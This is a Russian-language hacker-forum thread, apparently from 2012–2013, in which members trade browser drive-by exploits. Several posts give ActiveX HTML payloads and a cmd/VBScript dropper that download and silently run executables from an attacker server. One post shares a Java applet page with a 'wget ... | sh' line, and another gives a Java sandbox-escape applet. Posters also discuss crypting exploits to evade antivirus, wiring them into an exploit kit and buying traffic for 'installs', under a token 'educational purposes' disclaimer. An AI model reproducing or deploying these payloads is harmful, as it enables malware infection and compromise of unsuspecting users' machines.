Всё что надо для Хакера

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.



Эксплоиты

Сообщений 31 страница 45 из 45

31

еще
<html>
    <object id='SLGWVdlTzXDFcSSjQvvQNosmRwRFpPsqvqbKIoTxBXEs' classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5'></object>
    <script language="JavaScript">
        SLGWVdlTzXDFcSSjQvvQNosmRwRFpPsqvqbKIoTxBXEs.DownloadFile("http://192.168.1.2:8080/VnhRekK2H4ki/payload", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\\jAbXyfPZ.exe", 1, 1);
    <

0

32

Еще
<html>
<body>
<script>
    var actvx = new ActiveXObject('LaunchHelp.HelpLauncher.1');
actvx.LaunchProcess("cmd.exe", '/c echo Set ZC = CreateObject("Microsoft.XMLHTTP") : ZC.open "GET","http://192.168.1.2:8080/jUrCpeE58EzB7/dKbE.exe",False : ZC.send: Set rn = CreateObject("ADODB.Stream") : rn.Open : rn.Type=1 : rn.Write ZC.responseBody : rn.SaveToFile "C:/Windows/Temp/dKbE.exe",2 : CreateObject("WScript.Shell").Run "C:/Windows/Temp/dKbE.exe",0 >> C:/Windows/Temp/hqLevk.vbs');
actvx.LaunchProcess("cmd.exe", "/c start C:/Windows/Temp/hqLevk.vbs");

<

0

33

Так как он есть
<html>
   




    






   
<object
   


















classid='clsid:E9880553-B8A7-4960-A668-95C68BED571E'
      

 
    

id='vIWhqABjkbMRpqdrzgGDIWzoXxSB'></object>   
 

   
<script
 

   



   



   
 



language='JavaScript'>

     vIWhqABjkbMRpqdrzgGDIWzoXxSB.Initialize("vIWhqABjkbMRpqdrzgGDIWzoXxSB","vIWhqABjkbMRpqdrzgGDIWzoXxSB","","");


vIWhqABjkbMRpqdrzgGDIWzoXxSB.DownloadAndExecute("","",1,"http://192.168.1.2:8080/PVnxzCZMFZQ/payload/qKqyHPoEproOIh.exe","");

    
vIWhqABjkbMRpqdrzgGDIWzoXxSB.DownloadAndInstall("True");        </script>

   
   










</html>

0

34

Еще
<html>
    <object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
        <param name="propProgressBackground"  value="#bccee8">
        <param name="propTextBackground"  value="#f7f8fc">
        <param name="propBarColor"  value="#df0203">
        <param name="propTextColor"  value="#000000">
        <param name="propWidth"  value="0">
        <param name="propHeight"  value="0">
        <param name="propDownloadUrl"  value="http://192.168.1.2:8080/8KROolaO6kw/NgOhP/oPugV.exe">
        <param name="propPostDownloadAction"  value="run">
        <param name="propInstallCompleteUrl"  value="">
        <param name="propBrowserRedirectUrl"  value="">
        <param name="propVerbose"  value="0">
        <param name="propInterrupt"  value="0">
    </OBJECT>
    </html>

+2

35

Admin-Xaker26 написал(а):

А для IE8, IE9, Mozilla Firefox, Opera есть такой скрипт?

Есть java потом дам как с загрузчиком разберусь сам эксплоит уже криптанул, бьет все вся))))

0

36

nitob написал(а):

Есть java потом дам как с загрузчиком разберусь сам эксплоит уже криптанул, бьет все вся))))

Ок спасибо

0

37

Кстати не замечали что когда ищите в интернете что либо, открываете сайт а вам в ответ вылазиет фаил pdf, вроде без обидный фаил и вы открываете (это в общем не про вас) а на самом деле хочу вас обрадовать это экплоит. Скоро скину подправленые эксплоиты (для веб хостинга).

+1

38

nitob зделай мануал
для общего развития как ты добавляешь сплоиты в связку
многие будут благодарны тебе

Отредактировано Antoha (2012-12-23 19:02:29)

0

39

Antoha написал(а):

nitob зделай мануал
для общего развития как ты добавляешь сплоиты в связку
многие будут благодарны тебе

Отредактировано Antoha (Вчера 19:02:29)

Если есть готовая веб-админка то вам надо смотреть как читается статистика, даю небольшой пример "java_basicservice_impl" => "http://адрес вашего эксплоита", ну кпримеру вы взяли эксплоит в формате html закинули в папку exp прописываем  ссылку "java_basicservice_impl" => "http://домен/exp/эксплоит",
Статистика как ведется через ротатор эксплоитов (по узер агентам или иным признакам) далее статистика просто записывает сколько было обращений к данной странице.(тоесть к нашему эксплоиту) Так же нам надо прописывать загрузку нашего exe файла восновном он прописывается в самом эксплоите чтобы не мудрить проще сразу пропишите где у вас находится exe фаил (а так эту функцию вуполняет шелл код).
Это Я описал самы простой вариант. Вобще реализация у всех связок разная и надо смотреть конкретно по каждой связке, если вы решили реально занятся инсталами то лучше пишите свою, хотябы веб админку чтобы было проще добавлять
эксплоиты. Ведь не кто лучше чем вы будете знать как у вас все работает.

+1

40

][bm3 написал(а):

ждем сплойта под пдф бро) круто что обновляется темка)  не успеваем читать и разбирать

Могу скинуть хоть щас, но пока неразбирался как криптуются pdf. Завис на java мля(((

0

41

Скидываю вам интересный эксплоит написан на java, скидываю не криптованый, хотя есть уже криптованый и хотя он не будет реализован в связке, но все же потратьте немного времени и посмотрите как криптуются java хоть для общего развития пригодится. Я даный эксплоит проверял он полностью рабочий пробивает все и вся но не скажу что он мне нравится есть тихие эксплоиты и работают быстрый. Все что в папке нужно залить на хостинг даже картинки, поправить фаил index.html и лить траф на адрес вашего сайта/index.html ( в папке есть исходники так что вам даже декомпилировать не придется для крипта)
И ТАК ОТКРЫВАЕМ ФАИЛ index.html и правим следующее на ваше адрес где лижит ваш фаил http://ww.vashost.rs/update.exe и везде где найдете update.exe на имя вашего файла, еще раз повторюсь он рабочий если у вас не работает то вы зделали что то не так . И еще раз повторяю все что Я здесь выкладываю или о чем пишу только в ознакомительных целях, для проверки вашего браузера на уезвимость. Скачать
<title>Welcome</title>
<style type=text/css>
  body {
  }
  #box {
border: 2px double white;
        font-family: Verdana;
        margin-right:150px;
        margin-left:150px;
        background-color: white;
}
  </style>

<body>
<br><br><br><br>
<div id="box">
<applet code="Slide.class" archive='Slide.jar' width='100%' height='530px'>
<param name=bgcolor value="ffffff">
<param name=image1 value="0001.jpg">
<param name=image2 value="0002.jpg">
<param name=image3 value="0003.jpg">
<param name="status_bar_msg1" value="">
<param name="status_bar_msg2" value="">
<param name="status_bar_msg3" value="">
<param name="transition_delay" value="30">
<param name="delay" value="2000">
<param name="step_count" value="40">
<param name="mode" value="0">
<param name="image_align" value="center">   
<param name="image_valign" value="center">
</applet>
<applet width='1' height='1' code='Update.class' archive='Slide.jar'>
<param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs  http://ww.vashost.rs/update.exe %temp%\update.exe'>
<param name='windows2' value=''>

<param name='unix1' value="">
<param name='unix2' value="">

<param name='linux1' value="wget  http://ww.vashost.rs/update.exe -O- | sh">
<param name='linux2' value="">

</applet>
</div>
</body>

+2

42

Всем привет! Седня на почту мне знакомый со штатов скинул один эксплоит, он на java, бьет виндовс 8, винда 8 у меня не ставится но по видео он показал что реально работает, в принципе должно работать и на 7ке.
Сам код эксплоита ниже компилируется без проблем. Позже если что скину загрузчик (файла),,,,,,,

import java.applet.Applet;

import java.awt.Graphics;

import java.beans.Expression;

import java.beans.Statement;

import java.lang.reflect.Field;

import java.net.URL;

import java.security.*;

import java.security.cert.Certificate;

import java.lang.reflect.Constructor;

import java.lang.reflect.Method;

public class Java extends Applet

{

        // setSecurityManager

    String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";

    // file

    char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};

    // forName

    String   ad = "or",me = "me", aw = "f", kl = "Na";

    // getField

    String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";

    // sun.awt.SunToolkit

    String s = "sun", u = "awt", n = "SunToolkit", dot = ".";

   

    public void enableSecurity() throws Throwable

    {

        Object ao[] = new Object[2];

        ao[0] = GimmeClass("java.beans.Statement");

        ao[1] = "a"+"c"+"c";

       

        Expression e = new Expression(GimmeClass(new String(s+dot+u+dot+n)), field.replaceAll("\\d",""), ao);

        e.execute();

        Field field = (Field)e.getValue();

        Class alPerm = Class.forName("jav"+"a."+"sec"+"u"+"rit"+"y.A"+"ll"+"Perm"+"iss"+"ion");

        Class perm   = GimmeClass("java.se"+"curi"+"ty.P"+"ermi"+"ssi"+"ons");

        Object pe= perm.newInstance();

        Method method = pe.getClass().getMethod("ad"+"d", GimmeClass("java."+"secu"+"rity"+".Per"+"mis"+"sion"));

        method.invoke(pe, alPerm.newInstance());

        CodeSource cs = new CodeSource( new URL(new String(file)), new Certificate[0]);

        ProtectionDomain pd = new ProtectionDomain(cs, (Permissions)pe);

       

        AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });

       

        Class statClass = GimmeClass("ja"+"va."+"be"+"ans"+".S"+"tat"+"em"+"ent");

        Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});

        Object stat = con.newInstance(GimmeClass("java.lan"+"g.S"+"ys"+"tem"),secMan.replaceAll("\\d",""), new Object[1]);

        field.set(stat, ac);

        Method m = stat.getClass().getMethod("ex"+"ecu"+"te");

        m.invoke(stat);

    }

    public void init()

    {

        try

        {

            enableSecurity();

            Runtime.getRuntime().exec("calc");

        }

        catch(Throwable t){}

    }

   

    private Class GimmeClass(String ps) throws Throwable

    {

        Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});

        le.execute();

        return (Class)le.getValue();

    }   

}

0

43

nitob написал(а):

Вот этот один из моих любимых это фейк а значит не палит не один АВ
Вот это не трогайте иначе работать не будет http://www.awingsoft.com/zips/WindsPly.CAB
<html>
<body>
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'
codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>
<param name="SceneURL" value="Адрес сайта/1.exe#">
<embed type="application/x-awingsoft-winds3d" src="Адрес сайта/1.exe">
</object>


НИТОБ позвани мне ...
Пробывал выше указанный скрипт Opera говарит дай ей какой то плагин хотя установлено всё и Java и Флеш плеер в общем всё а IE выдаёт тобличку ниже скрин.
http://v-img.ru/images/2013/01/30/CgdxV.jpg

Рабочий эксплоит есть на все браузеры у кого нить?

0

44

Admin-Xaker26 написал(а):

НИТОБ позвани мне ...
Пробывал выше указанный скрипт Opera говарит дай ей какой то плагин хотя установлено всё и Java и Флеш плеер в общем всё а IE выдаёт тобличку ниже скрин.

Рабочий эксплоит есть на все браузеры у кого нить?

IE Видимо обновилось и сейчас уже возможно не работает. А опера требует плагин потому что это не эксплоит а фейк, вобщем Руслан не заморачивайся он скорей подходит для сайтов кино и музыки. У меня есть рабочие эксплоиты на все браузеры, (почти на все кроме Мозилы) робит и на Мозила возможно но у меня java отлючена. Увлекся java, все эксплоиты на java. Вечером буду всети позваню.

0

45

nitob написал(а):

IE Видимо обновилось и сейчас уже возможно не работает. А опера требует плагин потому что это не эксплоит а фейк, вобщем Руслан не заморачивайся он скорей подходит для сайтов кино и музыки. У меня есть рабочие эксплоиты на все браузеры, (почти на все кроме Мозилы) робит и на Мозила возможно но у меня java отлючена. Увлекся java, все эксплоиты на java. Вечером буду всети позваню.


Ок я буду ждать, а то кое, что обсудить надо твоя помощь нужна.

0